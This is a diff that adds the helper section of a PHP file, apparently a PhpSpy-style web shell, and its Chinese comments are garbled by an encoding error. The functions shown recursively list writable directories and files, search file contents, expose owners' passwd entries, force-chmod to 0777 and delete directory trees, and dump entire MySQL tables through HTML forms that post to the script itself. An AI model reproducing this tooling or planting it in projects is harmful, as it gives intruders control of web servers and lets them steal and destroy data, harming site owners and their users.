+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//����MYSQL���ݿ�
+function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	global $charsetdb;
+	@ini_set('mysql.connect_timeout', 5);
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if($charset && in_array(strtolower($charset), $charsetdb)) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// ȥ��ת���ַ�
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// ���HTML����
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// ��ȡȨ��
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// ɾ��Ŀ¼
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while($file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// �����м�ı���ɫ�滻
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// ��ȡ��ǰ���ļ�ϵͳ·��
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// ��ȡ��ǰĿ¼���ϼ�Ŀ¼
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ���PHP����
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// ��麯�����
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+// ����ļ���չ��
+function getext($file) {
+	$info = pathinfo($file);
+	return $info['extension'];
+}
+
+function GetWDirList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=$dir;
+					$dirdata[$j]['server_link']=$f;
+					$j++;
+				}
+				GetWDirList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function GetWFileList($dir){
+	global $filedata,$j,$nowpath, $writabledb;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$ext = getext($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetWFileList($f);
+			} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+				if (is_writable($f)) {
+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function GetSFileList($dir, $content, $re = 0) {
+	global $filedata,$j,$nowpath, $writabledb;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$ext = getext($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetSFileList($f, $content, $re = 0);
+			} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+				$find = 0;
+				if ($re) {
+					if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
+						$find = 1;
+					}
+				} else {
+					if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
+						$find = 1;
+					}
+				}
+				if ($find) {
+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) { 
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function q($sql) { 
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($fileSize) {
+	$size = sprintf("%u", $fileSize);
+	if($size == 0) {
+		return '0 Bytes' ;
+	}
+	$sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
+	return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
+}
+
+// �������ݿ�
+function sqldumptable($table, $fp=0) {
+
+	$tabledump = "DROP TABLE IF EXISTS `$table`;\n";
+	$res = q('SHOW CREATE TABLE `'.$table.'`');
+	$create = mysql_fetch_array($res);
+	$tabledump .= $create[1].";\n\n";
+
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+	$tabledump = '';
+	$rows = q("SELECT * FROM $table");
+	while ($row = mysql_fetch_assoc($rows)) {
+		foreach($row as $k=>$v) {
+			$row[$k] = "'".@mysql_real_escape_string($v)."'";
+		}
+		$tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			if ($arg['nokey']) {
+				foreach ($arg['option'] as $value) {
+					if ($arg['selected']==$value) {
+						p("<option value=\"$value\" selected>$value</option>");
+					} else {
+						p("<option value=\"$value\">$value</option>");
+					}
+				}
+			} else {
+				foreach ($arg['option'] as $key=>$value) {
+					if ($arg['selected']==$key) {
+						p("<option value=\"$key\" selected>$value</option>");
+					} else {
+						p("<option value=\"$key\">$value</option>");
+					}
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	global $self;
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function goback(){
+	global $self, $nowpath;
+	p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+function encode_pass($pass) {
+	$pass = md5($pass);
+	return $pass;
+}
+
+function pr($s){
+	echo "<pre>".print_r($s).'</pre>';
+}
+
+?>
\ No newline at end of file